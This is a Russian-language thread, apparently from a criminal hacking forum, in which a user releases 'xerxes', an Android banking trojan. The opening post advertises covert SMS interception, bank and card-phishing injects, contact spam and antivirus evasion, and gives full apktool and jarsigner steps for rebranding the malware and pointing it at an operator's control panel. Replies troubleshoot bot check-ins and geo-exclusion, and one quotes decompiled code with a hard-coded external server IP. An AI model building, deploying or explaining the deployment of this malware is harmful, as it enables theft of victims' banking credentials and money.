• XSS.stack #1 – первый литературный журнал от юзеров форума

malware Андроид бот xerxes

crack

ripper
КИДАЛА
Реакции
53
Пожалуйста, обратите внимание, что пользователь заблокирован
Бот писался на заказ. Клиент слился.Что умеет. СМС перехват скрытно, автопуши банков и картона,ручной запуск пушей, отправка смс, запуск инжектов, работа инжектов на всех версиях андроида, инжекты хранит на телефоне холдера,скачка смс, спам по контактам, автокрипт бота,шифрование траффа и дохрена что еще все описывать не хочу.
Бот не работает по ру.Крипт апи описывать в админке не стал лень если что позже выложу инструкцию.Бот работает на всех версиях андроид, тестировался и на последних 8-9.Установка простая есть мануал, заливаем на хостинг, прописываем базу в конфиге, заливаем базу.Нужен крипт, с криптом % 70 ботов живут неделями. По картону на нормальном траффике % 10-12 примерно, траффик с гугла. Палит пока 1 ав.Надеюсь сэкономить n k$ :)

Сборка бота:
Билд апк, ставим apktool
Распаковываем апк командой apktool d -f app.apk
Рекурсивно меняем адрес админки (http://localhost/), для любителей Windows ставим Notepad++ выбираем функцию заменить во всех файлах.
Если нужно сменить иконку идем в папку apk/app/res/mipmap-xxxhdpi и меняем иконку ic_launcher.png на нужную, название оставляем прежнее.
Название приложения можно сменить в манифесте
Все собираем билд apktool b app -o new_app.apk
Подписываем приложение командами
echo y | keytool -genkey -dname "CN=Unknown,O=Unknown,C=Unknown" -keystore mykeystore.keystore -keysize 1024 -alias b5a -validity 14000 -keypass 123456 -storepass 123456 -sigalg SHA1withDSA

jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore mykeystore.keystore new_app.apk b5a -keypass 123456 -storepass 123456
На этом вроде все!
Кто захочет отблагодарить BTC 1BgTjgmwXZaMYeCmDhhyYXzsbYv9bFcbpi
Если возникнут проблемы спрашивайте.
Линк
Пароль xerxes

Последнее редактирование:
нужна помощь собрать apk. Apktool скачал, распаковал, заменил localhost на название своего домена во всех файлах разобранного приложения, все сохранил. Собрал билд командой apktool b app -o new_app.apk , при попытке подписать командой
echo y | keytool -genkey -dname "CN=Unknown,O=Unknown,C=Unknown" -keystore mykeystore.keystore -keysize 1024 -alias b5a -validity 14000 -keypass 123456 -storepass 123456 -sigalg SHA1withDSA
выдает
keytool error: java.lang.Exception: Key pair not generated, alias <b5a> already
exists

загуглил, оказывается ошибка keytool: java.lang.Exception: пара ключей не сгенерирована, псевдоним <b5a> уже существует
ладно...
далее ввожу
jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore mykeystore.keystore new_app.apk b5a -keypass 123456 -storepass 123456
на выходе
Please specify alias name

Please type jarsigner -help for usage
exists
но apk ставиться на телефон без проблем, хотя отстука нет, видимо из за того что была ошибка при подписи приложения...
ТС, прошу у вас помощи.

нужна помощь собрать apk. Apktool скачал, распаковал, заменил localhost на название своего домена во всех файлах разобранного приложения, все сохранил. Собрал билд командой apktool b app -o new_app.apk , при попытке подписать командой

выдает
keytool error: java.lang.Exception: Key pair not generated, alias <b5a> already
exists

загуглил, оказывается ошибка keytool: java.lang.Exception: пара ключей не сгенерирована, псевдоним <b5a> уже существует
ладно...
далее ввожу

на выходе
Please specify alias name

Please type jarsigner -help for usage
exists
но apk ставиться на телефон без проблем, хотя отстука нет, видимо из за того что была ошибка при подписи приложения...
ТС, прошу у вас помощи.
Название домена + имя админ, http://localhost/adminpanel

Название домена + имя админ, http://localhost/adminpanel
С подписью apk разобрался, дело было в переменных окружения, и неправильном расположении файлов. Билд ставиться на ура, тут же предлагает ввести информацию по карте, и настойчиво просит включить Google Play.

Но отстука так и нет...
Я на хост в корневую папку "domain.com"выгружаю папку "xerxes", следовательно во всех .smali файлах в содержанием (всего нашел три таких файла в папке res, работал через Notepad++) нужно заменить выражение http://localhost/ на http://domain.com/xerxes/. Так?
PS: IP USA на телефоне и на PC

И то что бот не работает по ру, это определяется только geoIP, или ещё какими то критериями? Языками системы например, языками ввода...

Пробовал менять и IP, язык системы на EN, удалял русскую раскладку, переустановил заново приложение, но отстука так и нет.
ТС помогайте))

С подписью apk разобрался, дело было в переменных окружения, и неправильном расположении файлов. Билд ставиться на ура, тут же предлагает ввести информацию по карте, и настойчиво просит включить Google Play.

Но отстука так и нет...
Я на хост в корневую папку "domain.com"выгружаю папку "xerxes", следовательно во всех .smali файлах в содержанием (всего нашел три таких файла в папке res, работал через Notepad++) нужно заменить выражение http://localhost/ на http://domain.com/xerxes/. Так?
PS: IP USA на телефоне и на PC
ip значения не имеет, бот определяет по языку на телефоне и еще по ряду признаков, попробуйте с эмулятора там по дефолту обычно us

а где гарантия что файл не стучит в две админки? с чего вообще такая щедрость?)
ботом больше не занимаюсь, ставьте снифер смотрите траффик

все равно не понятно, хочешь слить, сливай сорцы, зачем сливать просто апк. обкатываешь софт? все очень мутно.

U.P.D. поглядел сорцы, написано просто ужасно. юзается куча либ, есть внешние конекты к примеру на сервер. админка просто солянка какая-то. инжекты стянуты с других ботов, просто формат. не помню, мазар помоему

Java:
  public static final String ENGINE_IMPLEMENTATION = "Engine";
  public static final String NON_TLS_CONNECTION = "Non_TLS";
  private static CNetTLSProviderBase Net = null;
  private static String Pass = "123456";
  private static String Path = null;
  private static String ProtocolType = "Non_TLS";
  public static final String SOCKET_IMPLEMENTATION = "Socket";
  public static final String TAG = "CNET";
  public static final String TLS_PROTOCOL = "TLS";
  private static Thread Wait = null;
  private static KeySecureManager km = null;
  public static boolean localhost = false;
  private static String localhost_port = "127.0.0.1:7275";
  private static CNet network = null;
  public static String slphost_port = "208.8.164.7:7275";
  private static TrustSecureManager tm = null;

все равно не понятно, хочешь слить, сливай сорцы, зачем сливать просто апк. обкатываешь софт? все очень мутно.
не хотите не юзайте,кому понравится бот могу продать и сорцы

не хотите не юзайте,кому понравится бот могу продать и сорцы
я и не собирюсь юзать, я разработчик. и я за качество. я бы такое и за 100 баксов не купил. не говоря уже про твой крипт. ты что все руками делал? что это такое kdfgsdlsdf по всем классам. это точно не рандом, так как юзается 3-4 буквы рядом стоящие ^_^

я и не собирюсь юзать, я разработчик. и я за качество. я бы такое и за 100 баксов не купил. не говоря уже про твой крипт. ты что все руками делал? что это такое kdfgsdlsdf по всем классам. это точно не рандом, так как юзается 3-4 буквы рядом стоящие ^_^
ахаха ты даже не понимаешь что это просто мусорные классы, этот апк не криптованый апк,мой крипт использует декс, твой интерес тут продать свое, а я тут лишний для тебя, я более чем честно поступаю я даю людям бесплатно а там уже им решать если понравятся заберут исходники. Повидал я вас балаболов со своими супер ботами=)

Ну как бы я ни чего не продаю) совсем ни чего) так что про конкурентов ни чего не надо мне тут говорить. чуток позже декомпилирую погляжу логику и твои "мусорные классы". если он не криптованный что за странные имена классов у тебя?
3317

А кстати за инжекты заебись решение, не спизжено и правда, но можно было сделать еще лучше. но идея крутая, так почти ни кто не делает.

код по админке случайно наткнулся на файл
3318

гуглим.
https://stackoverflow.com/questions/4356289/php-random-string-generator
можно дальше погуглить я думаю. м?

3319

структура проекта тоже шедевр, шаблон в каждом файле. как бы так уже давно ни кто не пишет.

Ну как бы я ни чего не продаю) совсем ни чего) так что про конкурентов ни чего не надо мне тут говорить. чуток позже декомпилирую погляжу логику и твои "мусорные классы". если он не криптованный что за странные имена классов у тебя?
Посмотреть вложение 3317
набьешь постов начнешь предлогать, иначе не стал бы ты говно разводить, я выложил бесплатно ты орешь про (я разработчик. и я за качество) за качестно чего чужих ботов=) бро ты что то темнишь тут)))
Ладно можешь срать дальше мне то пофиг я поделился с народом кто заинтересован будет в исходниках пишите, как писал выше по тестам бот показал на гугл трафике 10+%

ой Господи и что будет если я постов набью? у меня счетчик увеличится? я тебе делаю конкретные замечания, предложения по софту. а ты переходишь на личности :)

по строкам еще есть вопрос, почему бы не завести одну переменную GATE а везде пишешь http://localhost и чтобы что-то изменить нужно бегать по всему коду.

Адрес админки прописан в одном месте, статика, студия при сборки соберает и прописывает во все классах. Бро вместо того что бы искать пятна на трусах написал бы статью как нам дуракам код надо писать или интересное что.

не надо мне рассказывать, студия так не собирает, я тебе могу даже пример сделать, я собаку сьел на написании крипторов через декомпиляцию апк. это у тебя в коде статикой прописано

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх